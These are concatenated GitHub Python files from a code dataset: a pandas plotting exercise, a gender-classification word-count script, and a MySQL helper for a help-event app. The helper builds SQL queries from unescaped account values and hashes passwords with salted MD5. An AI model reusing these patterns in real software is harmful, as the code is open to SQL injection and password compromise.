(Set1, Set2 etc.). The value of this is a pandas table with\n keys x & y. So data['Set1'] is a pandas table for instance.xs\n\n\n \"\"\"\n\n db = 'ThirteenDatasets.db'\n con = lite.connect(db)\n\n # Get the tables.\n rows = con.execute('SELECT name FROM sqlite_master WHERE type=\"table\"')\n table_names = [row[0] for row in rows]\n\n # Now loop over these and create a dict with each set.\n data = dict()\n for tname in table_names:\n t = pd.read_sql_query(\"Select x, y From {0}\".format(tname), con)\n data[tname] = t\n\n con.close()\n \n # I return both the list of table names and the\n # data dictionary mostly for convenience. \n return table_names, data\n\n\ndef data_to_pandas_df(tnames, data):\n \"\"\"Convert data dict to pandas data frame\n\n This routine takes the data dictionary from read_visualisation_data\n and creates a Pandas data frame with x & y as keys as well as a column\n with the dataset name\n\n Parameters\n ----------\n tnames : list\n A list of names of the tables to include. Normally taken to be \n the output of read_visualisation_data\n data : dict\n A dict with the data, each dataset indexed by the table name.\n This is the format returned by read_visualisation_data\n \"\"\"\n\n # Since the datasets here have the same length, I could\n # create the arrays first and then populate them - that\n # would be faster and I would avoid the asarray gymnastics\n # below to keep it as numpy arrays.\n #\n # But numpy append is fine for this.\n\n dataset = []\n first = True\n for i, tn in enumerate(tnames):\n xcoord = np.asarray(data[tn]['x'].data)\n ycoord = np.asarray(data[tn]['y'].data)\n if (first):\n x = xcoord.copy()\n y = ycoord.copy()\n first = False\n else:\n x = np.append(x, xcoord)\n y = np.append(y, ycoord)\n\n # Append the table name for each x value\n label = [tn for i in range(len(xcoord))]\n dataset = dataset + label\n\n df = pd.DataFrame({'x': x, 'y': y, 'set': dataset})\n\n return df\n \ndef show_visualisations_multipanel(tnames, data):\n \"\"\"\n Show 2D visualisations for the data\n\n Parameters\n ----------\n tnames : list\n A list of names of the tables to plot. Normally taken to be \n the output of read_visualisation_data\n data : dict\n A dict with the data, each dataset indexed by the table name.\n This is the format returned by read_visualisation_data\n \n \"\"\"\n\n nx = 5\n ny = 3\n fig, axes = plt.subplots(ncols=nx, nrows=ny, figsize=(12, 8),\n sharex=True, sharey=True)\n plt.tick_params(axis='both', which='major', labelsize=8)\n dims = axes.shape\n print(\"Axes shape=\", dims)\n for i, tn in enumerate(tnames):\n x, y = data[tn]['x'], data[tn]['y']\n\n i_x, i_y = np.unravel_index(i, dims)\n axes[i_x, i_y].scatter(x, y, 10)\n axes[i_x, i_y].text(0.95, 0.93, tn, \n transform=axes[i_x, i_y].transAxes, ha='right', va='top')\n axes[i_x, i_y].set_xlim(0, 120)\n axes[i_x, i_y].set_ylim(0, 120)\n \n axes[2, 3].set_axis_off()\n axes[2, 4].set_axis_off()\n\n # I also want to remove white-space between the panels\n fig.subplots_adjust(hspace=0)\n plt.show()\n\n\ndef get_statistics(tnames, data):\n \"\"\"Calculate basic statistics for the data\n\n The data is assumed to be a dictionary returned from read_visualisation_data() \n \"\"\"\n\n # I know the number of data sets so I can make a set\n # of result arrays. There are more elegant ways to do this\n # for instance by using the .description function of Pandas\n # DataFrames, but I thought this was clearer.\n #\n # In general this is a less good solution though - because it\n # hardcodes information in several places\n n_datasets = len(tnames)\n stats = {'x': {'mean': np.zeros(n_datasets),\n 'median': np.zeros(n_datasets),\n 'std': np.zeros(n_datasets),\n '25%': np.zeros(n_datasets),\n '75%': np.zeros(n_datasets),\n 'max': np.zeros(n_datasets),\n 'min': np.zeros(n_datasets)},\n 'y': {'mean': np.zeros(n_datasets),\n 'median': np.zeros(n_datasets),\n 'std': np.zeros(n_datasets),\n '25%': np.zeros(n_datasets),\n '75%': np.zeros(n_datasets),\n 'max': np.zeros(n_datasets),\n 'min': np.zeros(n_datasets)}}\n\n for i, tn in enumerate(tnames):\n for key in ('x', 'y'):\n var = data[tn][key]\n stats[key]['mean'][i] = np.mean(var)\n stats[key]['median'][i] = np.median(var)\n stats[key]['std'][i] = np.std(var)\n stats[key]['25%'][i] = np.percentile(var, 25.)\n stats[key]['75%'][i] = np.percentile(var, 75.)\n stats[key]['min'][i] = np.min(var)\n stats[key]['max'][i] = np.max(var)\n \n\n return stats\n\ndef get_statistics_compact(tnames, data):\n \"\"\"\n Equivalent to the above - shorter and a bit more flexible but\n also probably a bit more less clear?\n \"\"\"\n\n stats = {'x': dict(), 'y': dict()}\n\n first = True\n for tn in tnames:\n summary = data[tn].describe()\n\n # If we are doing the first round through we need to create\n # the lists\n todo = summary['x'].keys()\n for key in ('x', 'y'):\n for x_todo in todo:\n if first:\n stats[key][x_todo] = []\n stats[key][x_todo].append(summary[key][x_todo])\n \n first = False\n\n return stats\n\n\ndef get_statistics_extendable(tnames, data, functions=None):\n \"\"\"\n Equivalent to the above two, but this one is more extendible\n\n The functions argument should be an array of functions to\n apply to the data. If this is set to None the a default set \n of functions are applied, namely:\n\n functions = {'mean': np.mean, 'median': np.median,\n '25%': lambda x: np.percentile(x, 25.0),\n '75%': lambda x: np.percentile(x, 75.0)}\n \"\"\"\n\n stats = {'x': dict(), 'y': dict()}\n if functions is None:\n functions = {'mean': np.mean, 'median': np.median,\n '25%': lambda x: np.percentile(x, 25.0),\n '75%': lambda x: np.percentile(x, 75.0)}\n n_datasets = len(tnames)\n first = True\n for i, tn in enumerate(tnames):\n for key in ('x', 'y'):\n var = data[tn][key]\n \n for todo, func in functions.iteritems():\n if first:\n stats[key][todo] = np.zeros(n_datasets)\n stats[key][todo][i] = func(var)\n \n first = False\n\n return stats\n\n\nif __name__ == \"__main__\":\n # execute only if run as a script\n tnames, data = read_visualisation_data()\n\n show_visualisations_multipanel(tnames, data)\n", "repo_name": "jbrinchmann/MLD2019", "sub_path": "ProblemSets/2 - Inference and Visualisation/Solution/problem2_2.py", "file_name": "problem2_2.py", "file_ext": "py", "file_size_in_byte": 7580, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 12, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sqlite3.connect", "line_number": 25, "usage_type": "call"}, {"api_name": "pandas.read_sql_query", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 71, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 79, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 85, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 106, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 106, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tick_params", "line_number": 108, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 108, "usage_type": "name"}, {"api_name": "numpy.unravel_index", "line_number": 114, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 126, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 126, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 143, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 144, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 145, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 146, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 147, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 148, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 149, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 150, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 151, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 152, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 153, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 154, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 155, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 156, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 161, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 162, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 163, "usage_type": "call"}, {"api_name": "numpy.percentile", "line_number": 164, "usage_type": "call"}, {"api_name": "numpy.percentile", "line_number": 165, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 166, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 167, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 213, "usage_type": "attribute"}, {"api_name": "numpy.median", "line_number": 213, "usage_type": "attribute"}, {"api_name": "numpy.percentile", "line_number": 214, "usage_type": "call"}, {"api_name": "numpy.percentile", "line_number": 215, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 224, "usage_type": "call"}]} +{"seq_id": "13945849021", "text": "import nltk\n\ndef genderDifferencesFeatures(text):\n\n\tgroom = \"\"\"cleaner clean washer wash perfume shave shaved shampoo cleansing soap shower\n\ttoothpaste cream facewash moisturizer nail lipstick makeup\"\"\"\n\n\tsleep = \"\"\"tiresome sleeping dazed sleeps insomnia napping nap siesta nightmare dream dreams bed\n\tpillow\"\"\"\n\n\ti = \"\"\"me myself mine my i\"\"\"\n\n\teating = \"\"\"fat dinner tasting drunken fed breakfast cookie eat tasted skinny cookbook\"\"\"\n\n\tdisgust = \"\"\"sickening revolting horror sick offensive obscene nauseous wicked\"\"\"\n\n\tfear = \"\"\"suspense creep dismay fright terrible terror afraid scare alarmed panicked panic\"\"\"\n\n\tsewing = \"\"\"mending stiching knitting knitter knit mend tailor suture embroidery seamstress needle\"\"\"\n\n\tpurpleness = \"\"\"purple mauve magenta lilac lavender orchid violet mulberry purply\"\"\"\n\n\tsweetness = \"\"\"syrup honey sugar bakery nectar sweet frost sugary dessert glaze nut\"\"\"\n\n\tbrownness = \"\"\"coffee biscuit biscuits walnut rust berry brown brunette cinnamon mahogany caramel chocolate\"\"\"\n\n\tchastity = \"\"\"shame elegant decent virtue virgin delicate faithful faithfulness platonic purity spotless\"\"\"\n\n\trelig = \"\"\"bless satanism angel communion spirit lord immortal theology prayers\"\"\"\n\n\tmetaph = \"\"\"suicide meditation cemetary temples drained immortalized mercy mourning\"\"\"\n\n\ttv = \"\"\"show ad comedies comedy tv actors drama soaps video theatres commercials commercial film films\"\"\"\n\n\tjob = \"\"\"credentials department financials desktop manage employee work career\"\"\"\n\n\toponent = \"\"\"finalist rival enemy competitor foe opposite defendant player dissident\"\"\"\n\n\ttheology = \"\"\"creed scholastic religious secularism theology religion divine faith dogma\"\"\"\n\n\tuniformity = \"\"\"evenness constancy constant persistence accordance steadiness steady firm firmness stable stability\"\"\"\n\n\tengineering = \"\"\"automotive process industrial manufacture measure construction technician\"\"\"\n\n\tinfluence = \"\"\"power force weak weakness inflexible ineffective charisma charm wimpy\"\"\"\n\n\t\n\tcountGroom = countSleep = countI = countEating = countDisgust = countFear = countSewing = 0\n\tcountPurpleness = countSweetness = countBrownness = countChastity = countRelig = countInfluence = 0\n\tcountMetaph = countTV = countJob = countOponent = countTheology = countUniformity = countEngineering = 0\n\n\ttotalWords = len(text.split())\n\t#print(totalWords)\n\n\ttext = text.lower()\n\ttext = nltk.word_tokenize(text)\n\tgroom = nltk.word_tokenize(groom)\n\tsleep = nltk.word_tokenize(sleep)\n\ti = nltk.word_tokenize(i)\n\teating = nltk.word_tokenize(eating)\n\tdisgust = nltk.word_tokenize(disgust)\n\tfear = nltk.word_tokenize(fear)\n\tsewing = nltk.word_tokenize(sewing)\n\tpurpleness = nltk.word_tokenize(purpleness)\n\tsweetness = nltk.word_tokenize(sweetness)\n\tbrownness = nltk.word_tokenize(brownness)\n\tchastity = nltk.word_tokenize(chastity)\n\trelig = nltk.word_tokenize(relig)\n\tinfluence = nltk.word_tokenize(influence)\n\tmetaph = nltk.word_tokenize(metaph)\n\ttv = nltk.word_tokenize(tv)\n\tjob = nltk.word_tokenize(job)\n\toponent = nltk.word_tokenize(oponent)\n\ttheology = nltk.word_tokenize(theology)\n\tuniformity = nltk.word_tokenize(uniformity)\n\tengineering = nltk.word_tokenize(engineering)\n\t\n\n\tfor word in text:\n\t\tif word in groom:\n\t\t\tcountGroom += 1\n\n\t\tif word in sleep:\n\t\t\tcountSleep += 1\n\n\t\tif word in i:\n\t\t\tcountI += 1\n\n\t\tif word in eating:\n\t\t\tcountEating += 1\n\n\t\tif word in disgust:\n\t\t\tcountDisgust += 1\n\n\t\tif word in fear:\n\t\t\tcountFear += 1\n\n\t\tif word in sewing:\n\t\t\tcountSewing += 1\n\n\t\tif word in purpleness:\n\t\t\tcountPurpleness += 1\n\n\t\tif word in sweetness:\n\t\t\tcountSweetness += 1\n\n\t\tif word in brownness:\n\t\t\tcountBrownness += 1\n\n\t\tif word in chastity:\n\t\t\tcountChastity += 1\n\n\t\tif word in relig:\n\t\t\tcountRelig += 1\n\n\t\tif word in metaph:\n\t\t\tcountMetaph += 1\n\n\t\tif word in tv:\n\t\t\tcountTV += 1\n\n\t\tif word in job:\n\t\t\tcountJob += 1\n\n\t\tif word in oponent:\n\t\t\tcountOponent += 1\n\n\t\tif word in theology:\n\t\t\tcountTheology += 1\n\n\t\tif word in uniformity:\n\t\t\tcountUniformity += 1\n\n\t\tif word in engineering:\n\t\t\tcountEngineering += 1\n\n\t\tif word in influence:\n\t\t\tcountInfluence += 1\n\n\ttry:\n\t\tcountGroom /= 1.0 * totalWords\n\texcept:\n\t\tcountGroom = 0\n\ttry:\n\t\tcountSleep /= 1.0 * totalWords\n\texcept:\n\t\tcountSleep = 0\n\ttry:\n\t\tcountI /= 1.0\n\texcept:\n\t\tcountI = 0\n\ttry:\n\t\tcountEating /= 1.0 * totalWords\n\texcept:\n\t\tcountEating = 0\n\ttry:\n\t\tcountDisgust /= 1.0 *totalWords\n\texcept:\n\t\tcountDisgust = 0\n\ttry:\n\t\tcountFear /= 1.0 * totalWords\n\texcept:\n\t\tcountFear = 0\n\ttry:\n\t\tcountSewing /= 1.0 * totalWords\n\texcept:\n\t\tcountSewing = 0\n\ttry:\n\t\tcountPurpleness /= 1.0 * totalWords\n\texcept:\n\t\tcountPurpleness = 0\n\ttry:\n\t\tcountBrownness /= 1.0 * totalWords\n\texcept:\n\t\tcountBrownness = 0\n\ttry:\n\t\tcountSweetness /= 1.0 * totalWords\n\texcept:\n\t\tcountSweetness = 0\n\ttry:\n\t\tcountChastity /= 1.0 * totalWords\n\texcept:\n\t\tcountChastity = 0\n\ttry:\n\t\tcountRelig /= 1.0 * totalWords\n\texcept:\n\t\tcountRelig = 0\n\ttry:\n\t\tcountMetaph /= 1.0 * totalWords\n\texcept:\n\t\tcountMetaph = 0\n\ttry:\n\t\tcountJob /= 1.0 * totalWords\n\texcept:\n\t\tcountJob = 0\n\ttry:\n\t\tcountTV /= 1.0 * totalWords\n\texcept:\n\t\tcountTV = 0\n\ttry:\n\t\tcountOponent /= 1.0 * totalWords\n\texcept:\n\t\tcountOponent = 0\n\ttry:\n\t\tcountTheology /= 1.0 * totalWords\n\texcept:\n\t\tcountTheology = 0\n\ttry:\n\t\tcountUniformity /= 1.0 * totalWords\n\texcept:\n\t\tcountUniformity = 0\n\ttry:\n\t\tcountEngineering /= 1.0 * totalWords\n\texcept:\n\t\tcountEngineering = 0\n\ttry:\n\t\tcountInfluence /= 1.0 * totalWords\n\texcept:\n\t\tcountInfluence = 0\n\n\treturn(countGroom, countSleep, countI, countEating, countDisgust, countFear, countSewing, countPurpleness,\n\t\tcountSweetness, countBrownness, countChastity, countRelig, countMetaph, countJob, countTV, countOponent,\n\t\tcountTheology, countUniformity, countEngineering, countInfluence)\n\ntext = \"\"\"This is hopeless countless priceless and I am indecisive. so sorry sorry I am feeling terrible \nthat I am unable to fulfil a WONderful TV mathematical brutal vicious terrific problem.\"\"\"\nprint(genderDifferencesFeatures(text))\n", "repo_name": "srvCodes/Gender-Classification-of-Blog-Author", "sub_path": "genderDifferencesFeatures.py", "file_name": "genderDifferencesFeatures.py", "file_ext": "py", "file_size_in_byte": 5904, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "nltk.word_tokenize", "line_number": 56, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 57, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 58, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 59, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 60, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 61, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 62, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 63, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 64, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 65, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 66, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 67, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 68, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 69, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 70, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 71, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 72, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 73, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 74, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 75, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 76, "usage_type": "call"}]} +{"seq_id": "14146794715", "text": "#!/usr/python\n\nimport sys\nimport random\nimport string\nimport hashlib\nimport MySQLdb\nimport ast\n\n\nfrom dbhelper import dbhelper\nfrom utils import KEY\n\n\n \n'''\nadd a new account to database.\n@params a dict data:\n includes account and password.\n@return -1 indicates params are not complete. Or account is not unique that leads to database fails.\n other number indicates success and the number is the id of the new account.\n'''\ndef add_account(data):\n if KEY.ACCOUNT not in data or KEY.PASSWORD not in data:\n return -1\n \n salt = ''.join(random.sample(string.ascii_letters, 8))\n md5_encode = hashlib.md5()\n md5_encode.update(data[KEY.PASSWORD]+salt)\n password = md5_encode.hexdigest()\n sql_account = \"insert into account (account, password, salt) values ('%s', '%s', '%s')\"\n sql_user = \"insert into user (id, nickname) values (%d, '%s')\"\n try:\n insert_id = dbhelper.insert(sql_account%(data[KEY.ACCOUNT], password, salt))\n dbhelper.insert(sql_user%(insert_id, data[KEY.ACCOUNT]))\n return insert_id\n except:\n return -1\n\n\n'''\nupdate information of an account.\n@params a dict data:\n includes id and chat_token:\n@return True if successfully modify chat_token\n False modification fails.\n'''\ndef update_account(data):\n if KEY.ID in data and KEY.CHAT_TOKEN in data:\n sql = \"update account set chat_token = '%s' where id = %d\"\n try:\n if dbhelper.execute(sql%(data[KEY.CHAT_TOKEN], data[KEY.ID])) > 0:\n return True\n except:\n return False\n else:\n return False\n\n\n'''\nmodify user's information.\n@params a dict data:\n options include user's name, nickname, gender, age, phone, location,\n (longitude and latitude), occupation, identity_id.\n@return True if successfully modify\n False modification fails.\n'''\ndef update_user(data):\n if KEY.ID not in data:\n return False\n result = True\n \n sql = \"\"\n if KEY.NAME in data:\n data[KEY.NAME] = MySQLdb.escape_string(data[KEY.NAME].encode(\"utf8\"))\n sql = \"update user set name = '%s' where id = %d\"\n try:\n dbhelper.execute(sql%(data[KEY.NAME], data[KEY.ID]))\n result &= True\n except:\n result &= False\n\n if KEY.NICKNAME in data:\n data[KEY.NICKNAME] = MySQLdb.escape_string(data[KEY.NICKNAME].encode(\"utf8\"))\n sql = \"update user set nickname = '%s' where id = %d\"\n try:\n dbhelper.execute(sql%(data[KEY.NICKNAME], data[KEY.ID]))\n result &= True\n except:\n result &= False\n\n if KEY.GENDER in data:\n sql = \"update user set gender = %d where id = %d\"\n try:\n dbhelper.execute(sql%(data[KEY.GENDER], data[KEY.ID]))\n result &= True\n except:\n result &= False\n\n if KEY.AGE in data:\n sql = \"update user set age = %d where id = %d\"\n try:\n dbhelper.execute(sql%(data[KEY.AGE], data[KEY.ID]))\n result &= True\n except:\n result &= False\n \n if KEY.PHONE in data:\n sql = \"update user set phone = '%s' where id = %d\"\n try:\n dbhelper.execute(sql%(data[KEY.PHONE], data[KEY.ID]))\n result &= True\n except:\n result &= False\n\n if KEY.LOCATION in data:\n data[KEY.LOCATION] = MySQLdb.escape_string(data[KEY.LOCATION].encode(\"utf8\"))\n sql = \"update user set location = '%s' where id = %d\"\n try:\n dbhelper.execute(sql%(data[KEY.LOCATION], data[KEY.ID]))\n result &= True\n except:\n result &= False\n\n if KEY.LONGITUDE in data and KEY.LATITUDE in data:\n sql = \"update user set longitude = %f, latitude = %f where id = %d\"\n try:\n dbhelper.execute(sql%(data[KEY.LONGITUDE], data[KEY.LATITUDE], data[KEY.ID]))\n result &= True\n except:\n result &= False\n elif not (KEY.LONGITUDE not in data and KEY.LATITUDE not in data):\n result &= False\n\n if KEY.OCCUPATION in data:\n sql = \"update user set occupation = %d where id = %d\"\n try:\n dbhelper.execute(sql%(data[KEY.OCCUPATION], data[KEY.ID]))\n result &= True\n except:\n result &= False\n\n if KEY.IDENTITY_ID in data:\n sql = \"update user set identity_id = '%s' where id = %d\"\n try:\n dbhelper.execute(sql%(data[KEY.IDENTITY_ID], data[KEY.ID]))\n result &= True\n except:\n result &= False\n\n return result\n\n\n'''\nget salt of an account.\n@params include user's account.\n@return salt of an account.\n None if account not exists or database query error.\n'''\ndef get_salt(data):\n if KEY.ACCOUNT not in data:\n return None\n sql = \"select salt from account where account = '%s'\"\n try:\n res = dbhelper.execute_fetchone(sql%(data[KEY.ACCOUNT]))\n if res is None:\n return None\n else:\n return res[0]\n except:\n return None\n\n\n'''\nvalidate whether password is correct.\n@params includes user's account and password.\n password need to be md5 encode.\n@return user's id if password is correct.\n -1 otherwise.\n'''\ndef validate_password(data):\n if KEY.ACCOUNT not in data or KEY.PASSWORD not in data or KEY.SALT not in data:\n return -1\n sql = \"select id, password from account where account = '%s' and salt = '%s'\"\n user_id = -1\n password = None\n try:\n res = dbhelper.execute_fetchone(sql%(data[KEY.ACCOUNT], data[KEY.SALT]))\n if res is not None:\n user_id = res[0]\n password = res[1]\n except:\n pass\n finally:\n if password is None or data[KEY.PASSWORD] is None:\n return -1\n elif password == data[KEY.PASSWORD]:\n return user_id\n else:\n return -1\n\n\n'''\nmodify user's password to a new one, but not modify its salt value.\n@params include user's account. \n new password that encode with salt by md5.\n@return true if successfully modify.\n false otherwise.\n'''\ndef modify_password(data):\n if KEY.ACCOUNT not in data or KEY.PASSWORD not in data:\n return False\n sql = \"update account set password = '%s' where account = '%s'\" \n try:\n n = dbhelper.execute(sql%(data[KEY.PASSWORD], data[KEY.ACCOUNT]))\n if n > 0:\n return True\n else:\n return False\n except:\n return False\n \n \n'''\nget user's information, which includes user's name, nickname, gender ...... .\n@params include user's id.\n@return a json includes user's concrete information.\n None if params error or database query error.\n'''\ndef get_user_information(data):\n if KEY.ID not in data:\n return None\n sql = \"select * from user where id = %d\"\n try:\n res = dbhelper.execute_fetchone(sql%(data[KEY.ID]))\n if res is None:\n return None\n else:\n user = {}\n user[KEY.ID] = res[0]\n user[KEY.NAME] = res[1]\n user[KEY.NICKNAME] = res[2]\n user[KEY.GENDER] = res[3]\n user[KEY.AGE] = res[4]\n user[KEY.PHONE] = res[5]\n user[KEY.LOCATION] = res[6]\n user[KEY.LONGITUDE] = float(res[7])\n user[KEY.LATITUDE] = float(res[8])\n user[KEY.OCCUPATION] = res[9]\n user[KEY.REPUTATION] = float(res[10])\n user[KEY.IDENTITY_ID] = res[12]\n user[KEY.IS_VERIFY] = res[14]\n return user\n except:\n return None\n\n\n'''\nlaunch a help event by launcher.\n@params includes user's id and type of help event.\n help event types:\n 0 represents normal question.\n 1 represents nornal help.\n 2 represents emergency.\n other option params includes content of event, longitude and latitude of event.\n@return event_id if successfully launches.\n -1 if fails.\n'''\ndef add_event(data): \n if KEY.ID not in data or KEY.TYPE not in data:\n return -1\n sql = \"insert into event (launcher, type, time) values (%d, %d, now())\"\n event_id = -1\n try:\n event_id = dbhelper.insert(sql%(data[KEY.ID], data[KEY.TYPE]))\n if event_id > 0:\n data[KEY.EVENT_ID] = event_id\n update_event(data)\n return event_id\n except:\n return -1\n\n\n'''\nmodify information of a help event.\n@params includes event_id, which is id of the event to be modified.\n option params includes: content of event, longitude and latitude of event, state of event.\n@return True if successfully modifies.\n False otherwise.\n'''\ndef update_event(data):\n result = True\n sql = \"\"\n if KEY.CONTENT in data:\n data[KEY.CONTENT] = MySQLdb.escape_string(data[KEY.CONTENT].encode(\"utf8\"))\n sql = \"update event set content = '%s' where id = %d\"\n try:\n dbhelper.execute(sql%(data[KEY.CONTENT], data[KEY.EVENT_ID]))\n result &= True\n except:\n result &= False\n \n if KEY.LONGITUDE in data and KEY.LATITUDE in data:\n sql = \"update event set longitude = %f, latitude = %f where id = %d\"\n try:\n dbhelper.execute(sql%(data[KEY.LONGITUDE], data[KEY.LATITUDE], data[KEY.EVENT_ID]))\n result &= True\n except:\n result &= False\n\n if KEY.STATE in data:\n if data[KEY.STATE] == 0:\n data[KEY.STATE] = 1\n sql = \"update event set state = %d where id = %d\"\n try:\n dbhelper.execute(sql%(data[KEY.STATE], data[KEY.EVENT_ID]))\n result &= True\n except:\n result &= False\n\n return result\n\n\n'''\nremove a help event by event launcher.\n@params includes user's id, which is remover. Actually, only the launcher can remove his/her event.\n event's id, which represents the event to be removed.\n@return True if successfully removes, or remover is not the launcher, actually nothing happens.\n False if fails.\n'''\ndef remove_event(data):\n if KEY.ID not in data or KEY.EVENT_ID not in data:\n return False\n sql = \"delete from event where id = %d and launcher = %d\"\n try:\n dbhelper.execute(sql%(data[KEY.EVENT_ID], data[KEY.ID]))\n return True\n except:\n return False\n\n\n'''\nget information of a help event.\n@params includes id of the event to get.\n@return concrete information of the event:\n event_id, launcher's id and his/her nickname, content, type, time, longitude and latitude, state, number of followers, number of supporters and group points.\n None indicates fail query.\n'''\ndef get_event_information(data):\n if KEY.EVENT_ID not in data:\n return None\n event_info = None\n sql = \"select * from event where id = %d\"\n try:\n sql_result = dbhelper.execute_fetchone(sql%(data[KEY.EVENT_ID]))\n if sql_result is not None:\n event_info = {}\n event_info[KEY.EVENT_ID] = sql_result[0]\n event_info[KEY.LAUNCHER_ID] = sql_result[1]\n event_info[KEY.CONTENT] = sql_result[2]\n event_info[KEY.TYPE] = sql_result[3]\n event_info[KEY.TIME] = str(sql_result[4])\n event_info[KEY.LONGITUDE] = float(sql_result[5])\n event_info[KEY.LATITUDE] = float(sql_result[6])\n event_info[KEY.STATE] = sql_result[7]\n event_info[KEY.FOLLOW_NUMBER] = sql_result[8]\n event_info[KEY.SUPPORT_NUMBER] = sql_result[9]\n event_info[KEY.GROUP_PTS] = float(sql_result[10])\n user = {}\n user[KEY.ID] = event_info[KEY.LAUNCHER_ID]\n user = get_user_information(user)\n if user is not None:\n event_info[KEY.LAUNCHER] = user[KEY.NICKNAME]\n except:\n pass\n finally:\n return event_info\n\n\n'''\nget information of a collection of events.\n@params includes data, a json that contains user's id and type of events to get.\n get_event_id_list a method of getting event id list.\n@return a array of events. each element is information of an event in json form.\n'''\ndef get_events(data, get_event_id_list):\n event_id_list = get_event_id_list(data)\n event_list = []\n event_info = {}\n for event_id in event_id_list:\n event_info[KEY.EVENT_ID] = event_id\n event_info = get_event_information(event_info)\n if event_info is not None:\n event_list.append(event_info)\n return event_list\n\n\n'''\nget events that launch by user.\n@params includes user's id, \n option params includes state indicates all events or those starting or ended.\n type indicates type of events.\n@return an array of result event ids.\n'''\ndef get_launch_event_list(data):\n event_id_list = []\n if KEY.ID not in data:\n return event_id_list\n sql = \"select id from event where launcher = %d\"%data[KEY.ID]\n if KEY.STATE in data:\n if data[KEY.STATE] == 0 or data[KEY.STATE] == 1: \n sql += \" and state = %d\"%data[KEY.STATE]\n if KEY.TYPE in data:\n if data[KEY.TYPE] >= 0 and data[KEY.TYPE] <= 2:\n sql += \" and type = %d\"%data[KEY.TYPE]\n sql += \" order by time DESC\"\n sql_result = dbhelper.execute_fetchall(sql)\n for each_result in sql_result:\n for each_id in each_result:\n event_id_list.append(each_id)\n\n return event_id_list\n\n\n'''\nget user's follow or support events.\n@params includes user's id and type of user's state in event.\n user's state 0 indicates follow, and 1 indicates support.\n@return an array of result event ids.\n'''\ndef get_join_event_list(data):\n event_id_list = []\n if KEY.ID not in data:\n return event_id_list\n sql = \"select event_id from support_relation where supporter = %d\"%data[KEY.ID]\n if KEY.TYPE in data:\n if data[KEY.TYPE] == 1 or data[KEY.TYPE] == 2:\n sql += \" and type = %d\"%data[KEY.TYPE]\n sql += \" order by time DESC\"\n sql_result = dbhelper.execute_fetchall(sql)\n for each_result in sql_result:\n for each_id in each_result:\n event_id_list.append(each_id)\n\n return event_id_list\n\n\n'''\nmanage relation of user and event.\n@params\n@return\n'''\ndef user_event_manage(data):\n if KEY.ID not in data or KEY.EVENT_ID not in data:\n return False\n if KEY.OPERATION not in data:\n return True\n if data[KEY.OPERATION] < 0 or data[KEY.OPERATION] > 2:\n return False\n sql = \"select launcher from event where id = %d\"\n launcher_id = None\n try:\n sql_result = dbhelper.execute_fetchone(sql%(data[KEY.EVENT_ID]))\n if sql_result is not None:\n launcher_id = sql_result[0]\n except:\n pass\n if launcher_id is None:\n return False\n if data[KEY.OPERATION] == 0:\n sql = \"delete from support_relation where event_id = %d and supporter = %d\"%(data[KEY.EVENT_ID], data[KEY.ID])\n else:\n sql = \"replace into support_relation (event_id, supportee, supporter, type, time) values (%d, %d, %d, %d, now())\"%(data[KEY.EVENT_ID], launcher_id, data[KEY.ID], data[KEY.OPERATION])\n try:\n dbhelper.execute(sql)\n except:\n return False\n\n #\n 